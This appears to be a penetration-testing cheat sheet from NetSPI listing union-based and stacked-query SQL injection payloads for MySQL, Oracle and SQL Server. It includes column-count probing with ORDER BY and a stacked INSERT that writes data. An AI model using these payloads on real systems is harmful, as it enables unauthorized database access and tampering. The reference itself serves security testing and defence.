Union-Based Injection

Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns).

Description Query
Union SELECT "mysql" UNION SELECT @@version
Union subquery SELECT "mysql" UNION (select @@version)
Union null
Note: If original query returns more than one column, add null to equal the number of columns
SELECT "mysql","test" UNION SELECT @@version,null
Stacked Queries
Note: Stacked queries do not always return results, so they are best used for injections that update/modify data.
SELECT "mysql"; INSERT INTO 'docs' ('content') VALUES ((SELECT @@version))

Union-Based Injection

Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns).

Description Query
Union SELECT user FROM dual UNION SELECT * FROM v$version
Union subquery SELECT user FROM dual UNION (SELECT * FROM v$version)
Union null
Note: If original query returns more than one column, add null to equal the number of columns
SELECT user,dummy FROM dual UNION (SELECT banner,null FROM v$version)

Union-Based Injection

Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns).

Description Query
Union SELECT user UNION SELECT @@version
Union subquery SELECT user UNION (SELECT @@version)
Union null
Note: If original query returns more than one column, add null to equal the number of columns
SELECT user,system_user UNION (SELECT @@version,null)
Union null binary halving
Note: This query is used to detect the number of columns. Too many columns returns an error, find the [numberOfColumns] that is 1 away from an error
SELECT * FROM yourtable ORDER BY [numberOfColumns]
Stacked query
Note: Stacked queries do not always return results, so they are best used for injections that update/modify data.
SELECT @@version; SELECT @@version --

© 2018 Copyright by NetSPI. All rights reserved.